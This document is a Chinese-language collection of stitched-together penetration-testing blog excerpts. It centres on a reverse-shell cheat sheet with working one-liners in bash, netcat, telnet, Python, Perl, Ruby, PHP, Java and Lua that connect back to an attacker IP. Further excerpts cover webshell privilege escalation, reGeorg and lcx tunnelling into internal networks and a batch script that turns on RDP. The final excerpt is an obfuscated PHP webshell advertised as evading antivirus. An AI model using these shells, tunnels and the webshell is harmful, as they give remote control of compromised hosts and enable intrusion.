0x00 三种shell shell 主要分为三种类型：反向 Shell、绑定 Shell 和 Web Shell。这些 shell 中的每一个都有不同的与我们通信的方法来接受和执行我们的命令。 外壳类型沟通方式Reverse Shell连接回我们的系统并通过反向连接让我们控制。Bind Shell等待我们连接到它并在我们连接后给予我们控制权。Web Shell通过 Web 服务器通信，通过 HT...

0x00 前言 在渗透测试的过程中，在拿到webshell以后，如果目标主机是Windows主机，则是通过开3389端口在远程连接，如果目标主机是linux服务器，一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。 0x01 Bash反弹 1.1 方法一 攻击者主机上执行监听： nc -lvvp port 目标主机上执行： bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一个交互的bash#>& 将标准错误输出重定向到标准输出#/dev/tcp/x.x.x.x/port   意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip，port为端口#0>&1 标准输入重定向到标准输出，实现你与反弹出来的shell的交互 注：/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理，Linux中还存在/dev/udp/。 inux shell下常用的文件描述符是： 1.标准输入 (stdin) ：代码为 0 ，使用 < 或 << ； 2.标准输出 (stdout)：代码为 1 ，使用 > 或 >> ； 3.标准错误输出(stderr)：代码为 2 ，使用 2> 或 2>>。 另外由于不同Linux发行版之间的差异，该命令在某些系统上可能并不适用。 1.2 方法二 exec 0&0 2>&00<&196;exec 196<>/dev/tcp/x.x.x.x/4444; sh <&196 >&196 2>&196/bin/bash -i > /dev/tcp/x.x.x.x/8080 0<&1 2>&1 1.3 方法三 exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do $line 2>&5 >&5; done 0x02 telnet反弹 2.1 方法一 攻击者主机上打开两个终端分别执行监听： nc -lvvp 4444nc -lvvp 5555 目标主机中执行： telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555 监听两个端口分别用来输入和输出，其中x.x.x.x均为攻击者ip 反弹shell成功后，在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。 2.2 方法二 rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p 0x03 nc（netcat）反弹 攻击者主机上执行监听命令： nc -lvvp port 目标主机上执行： nc -e /bin/bash x.x.x.x port 如果目标主机linux发行版本没有 -e 参数，还有以下几种方式： rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f 注：mkfifo 命令的作用是创建FIFO特殊文件，通常也称为命名管道，FIFO文件在磁盘上没有数据块，仅用来标识内核中的一条通道，各进程可以打开FIFO文件进行read/write，实际上是在读写内核通道（根本原因在于FIFO文件结构体所指向的read、write函数和常规文件不一样），这样就实现了进程间通信 nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555   #从4444端口获取到命令，bash 运行后将命令执行结果返回 5555 端口，攻击者主机上也是打开两个终端分别执行监听。nc -c /bin/sh x.x.x.x 4444/bin/sh | nc x.x.x.x 4444 0x04 常见脚本反弹 4.1 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 4.2 perl 4.2.1 方法一 perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 4.2.2 方法二 perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 4.3 Ruby 4.3.1 方法一 ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 4.3.2 方法二 ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 4.4 PHP php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");' 4.5 Java public class Revs {/*** @param args* @throws Exception */public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime();    String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor();}} 4.6 Lua lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');" 注：以上脚本是在目标主机上执行，其中 x.x.x.x 均为攻击者ip，并且需要在攻击者主机上进行监听: nc -lvvp 5555 0x05 总结 上面提到的是常见的反弹shell的方式，肯定还有其他的方式，欢迎大家补充，这里也会不断的跟新。 ...

小攻：IP地址：192.168.139.129  Win7 小受：IP地址：192.168.139.128，Ubuntu 一、拿到webshell后，点击反弹提权 二、小攻运行nv -vv -l -p 3355 三、在反弹提权页面，输入小攻的地址及上面监听的端口号，点击开始连接 四、小攻已成功连接小受，输入命令函数whoami查看权限是www 五、查看该系统版本号uname -a，根据该版本号查找相应的EXP，上传到小受并执行 六、工具下载：加入交流群 禁止非法，后果自负 ...

小攻：IP地址：192.168.1.103   win7 小受：IP地址：双网卡192.168.1.105/192.168.4.11  win2003 当拿到一台内网主机的时候，如何将攻击机加入到对方内网网络，可以通过reGeorg实现 一、下载地址（软件作者） https://github.com/sensepost/reGeorg 二、通过webshell将对应的文件上传到服务器，有php、jsp等等 三、运行reGeorg python reGeorgSocksProxy.py -p 1234 -uhttp://192.168.1.105/tunnel.aspx 四、打开代理工具Proxifier 1、添加代理 五、通过御剑扫描，如果不在一个内网就不能扫描，通过上面操作，就可以扫描另一个网卡了 六、工具下载：加入交流群 注意：软件均来自网络，不能保证安全性 ...

一、环境： 1、内网主机IP：192.168.1.106  win2003 2、假设外网主机ip：192.168.1.104 win7 二、通过大马上传lcx.exe到服务器内网 1、将内网3389端口转发到外网2222端口 lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389 2、在攻击机win7监听2222本地端口，转发到4444端口 lcx.exe -listen 2222 4444 3、在攻击机win7中远程连接 三、利用工具转发reDuh 1、将软件自带的脚本拷贝到服务器中，根据不同环境，选择不同脚本 2、打开reDuh，将脚本文件上传的路径填写到URL，点击start，再点击create 3、打开远程连接，这个有点缓慢，但是可以连接成功的，详细见交流群视频教程 工具下载方式：加入交流群 ...

一、查询远程连接的端口 1、命令查询，win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 2、批处理开启，将下面代码复制到bat文件，双击自行开启远程连接 echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg 三、当3389端口被修改后，如何查找 1、通过大马的读注册表、找到3389端口，然后读取 2、通过大马的cmd命令 tasklist /svc,获取termservice的pid号 再执行netstat -ano查找2684对应的的端口就是远程连接端口 3、通过工具扫描 工具下载方式：加入交流群 注意：软件均来自网络，不能保证安全性 ...

一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12，打开谷歌自带的开发人员工具，点击network 三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码 四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改 注意：抓包的时候，有的后门不是一登录就发送的，也有可能停一段时间才发送，甚至当你退出的时候才发送 ...

前言       2019年9月9日最新免杀php变种一句话，亲测过啊D，不知道什么时候加入特征库报毒，反正现在能用吧。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6']; ?> 说明 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码...